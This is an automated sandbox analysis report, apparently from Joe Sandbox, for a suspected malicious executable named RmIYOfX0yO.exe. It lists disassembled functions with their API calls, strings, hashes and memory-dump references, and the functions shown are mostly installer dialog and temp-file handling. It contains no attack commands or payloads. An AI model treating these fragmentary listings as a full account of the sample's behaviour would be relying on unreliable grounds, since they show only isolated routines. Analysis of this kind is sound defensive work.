SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
Instruction ID: 2f2862f802f4bb8c259b254183006bf3f0de574643f6f04ef9dece27a841d158
Opcode Fuzzy Hash: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
Instruction Fuzzy Hash: 24C04C71740600BBDA208B509E45F1677546754740F1448697740A50E0C674E410D62D

Function 0040336E Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Function 0040427C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
Instruction ID: 7863800e542b6cbc8ec812c2a21dbba0b6cde8a84852b126545aa60b8f7f929b
Opcode Fuzzy Hash: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
Instruction Fuzzy Hash: 13B01235285A00FBDE214B00EE09F457E62F76CB01F008478B340240F0CAB300B1DF19

Function 00404269 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404041), ref: 00404273

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
Instruction ID: 08295bde0fd8e02eb16c20732bdcb1eb6333efd9321479dd2e2322931d05c33c
Opcode Fuzzy Hash: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
Instruction Fuzzy Hash: ADA001B6644500ABCE129F90EF49D0ABB72EBE4B02B518579A285900348A365961FB59

Non-executed Functions

Function 00404C5E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C76
GetDlgItem.USER32(?,00000408), ref: 00404C81
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCB
LoadBitmapW.USER32(0000006E), ref: 00404CDE
SetWindowLongW.USER32(?,000000FC,00405256), ref: 00404CF7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D1D
SendMessageW.USER32(?,00001109,00000002), ref: 00404D33
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3F
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D51
DeleteObject.GDI32(00000000), ref: 00404D54
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E21
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E4C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E60
GetWindowLongW.USER32(?,000000F0), ref: 00404E8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E9D
ShowWindow.USER32(?,00000005), ref: 00404EAE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405010
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405025
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405049
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405069
ImageList_Destroy.COMCTL32(?), ref: 0040507E
GlobalFree.KERNEL32(?), ref: 0040508E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405107
SendMessageW.USER32(?,00001102,?,?), ref: 004051B0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BF
InvalidateRect.USER32(?,00000000,00000001), ref: 004051DF
ShowWindow.USER32(?,00000000), ref: 0040522D
GetDlgItem.USER32(?,000003FE), ref: 00405238
ShowWindow.USER32(00000000), ref: 0040523F

Strings

N, xrefs: 00404EE9
M, xrefs: 00404E08
, xrefs: 00405217

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
Instruction ID: 46f3c2dfcfe7d78df06ebec09318e15d32e2b04993d9507e8b01d99ed80ca2ca
Opcode Fuzzy Hash: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
Instruction Fuzzy Hash: CA026EB0A00209AFDF209F65DD45AAE7BB5FB44314F10817AF610BA2E1C7799E52CF58

Function 004046E2 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404731
SetWindowTextW.USER32(00000000,?), ref: 0040475B
SHBrowseForFolderW.SHELL32(?), ref: 0040480C
CoTaskMemFree.OLE32(00000000), ref: 00404817
lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404849
lstrcatW.KERNEL32(?,: Completed), ref: 00404855
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404867

Part of subcall function 004058AC: GetDlgItemTextW.USER32(?,?,00000400,0040489E), ref: 004058BF

Part of subcall function 00406417: CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
Part of subcall function 00406417: CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
Part of subcall function 00406417: CharNextW.USER32(0040A230,"C:\Users\user\Desktop\RmIYOfX0yO.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
Part of subcall function 00406417: CharPrevW.USER32(0040A230,0040A230,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 0040492A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404945

Part of subcall function 00404A9E: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
Part of subcall function 00404A9E: wsprintfW.USER32 ref: 00404B48
Part of subcall function 00404A9E: SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B

Strings

A, xrefs: 00404805
: Completed, xrefs: 00404843, 00404848, 00404853
H7B, xrefs: 004047DF
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00404832

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\magmaet\clenched$H7B
API String ID: 2624150263-1280379044
Opcode ID: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
Instruction ID: 9c6f5067bad78934a321292c7affeb857c6c8b78ef178650078e6910c23b8850
Opcode Fuzzy Hash: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
Instruction Fuzzy Hash: D8A183F1A00208ABDF11AFA5CD45AAFB7B8EF84314F10843BF611B62D1D77C99418B69

Function 004043E4 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404482
GetDlgItem.USER32(?,000003E8), ref: 00404496
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044B3
GetSysColor.USER32(?), ref: 004044C4
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044D2
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044E0
lstrlenW.KERNEL32(?), ref: 004044E5
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044F2
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404507
GetDlgItem.USER32(?,0000040A), ref: 00404560
SendMessageW.USER32(00000000), ref: 00404567
GetDlgItem.USER32(?,000003E8), ref: 00404592
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D5
LoadCursorW.USER32(00000000,00007F02), ref: 004045E3
SetCursor.USER32(00000000), ref: 004045E6
ShellExecuteW.SHELL32(0000070B,open,00428200,00000000,00000000,00000001), ref: 004045FB
LoadCursorW.USER32(00000000,00007F00), ref: 00404607
SetCursor.USER32(00000000), ref: 0040460A
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404639
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464B

Strings

: Completed, xrefs: 004045C1
open, xrefs: 004045F3
[C@, xrefs: 004045F0
N, xrefs: 00404580

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$N$[C@$open
API String ID: 3615053054-3308546834
Opcode ID: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
Instruction ID: 197425fdc48522821a3d1a28f7e64f0f4dcf149373df3ed1280bb5b235060fa2
Opcode Fuzzy Hash: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
Instruction Fuzzy Hash: D471A4B1A00209FFDB109F60DD85E6A7B69FB84344F00453AFA05B62E0D7799D51CFA9

Function 00405EB2 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00426DE8,NUL,?,00000000,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EC1
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EE5
GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00405EEE

Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF

GetShortPathNameW.KERNEL32(uB,004275E8,00000400), ref: 00405F0B
wsprintfA.USER32 ref: 00405F29
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?), ref: 00405F64
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F73
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAB
SetFilePointer.KERNEL32(0040A5A8,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5A8,00000000,[Rename],00000000,00000000,00000000), ref: 00406001
GlobalFree.KERNEL32(00000000), ref: 00406012
CloseHandle.KERNEL32(00000000), ref: 00406019

Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405D5C
Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

Strings

uB, xrefs: 00405F07
uB, xrefs: 00405F00
mB, xrefs: 00405EB6
[Rename], xrefs: 00405F93, 00405FA5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405EB2
%ls=%ls, xrefs: 00405F1F
NUL, xrefs: 00405EBB

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$Error writing temporary file. Make sure your temp folder is valid.$NUL$[Rename]$mB$uB$uB
API String ID: 222337774-3510403337
Opcode ID: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
Instruction ID: e0a3a616164006467439f71a5ee21b177f06bf99c86c19659b49dd792d0ed9da
Opcode Fuzzy Hash: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
Instruction Fuzzy Hash: 52312230241B157BD2206B618D09F6B3A5CEF85755F25003BFA42F62D2DA3CD9118ABD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
Instruction ID: e4307af7b63af3c060521be2e9f36853b9854247f946bef182d968856dcca5c3
Opcode Fuzzy Hash: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
Instruction Fuzzy Hash: BB418B71800209AFCF058FA5DE459AFBBB9FF45310F00842EF991AA1A0C738DA55DFA4

Function 00406417 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
CharNextW.USER32(0040A230,"C:\Users\user\Desktop\RmIYOfX0yO.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
CharPrevW.USER32(0040A230,0040A230,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406418
"C:\Users\user\Desktop\RmIYOfX0yO.exe", xrefs: 0040645B
*?|<>/":, xrefs: 00406469

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
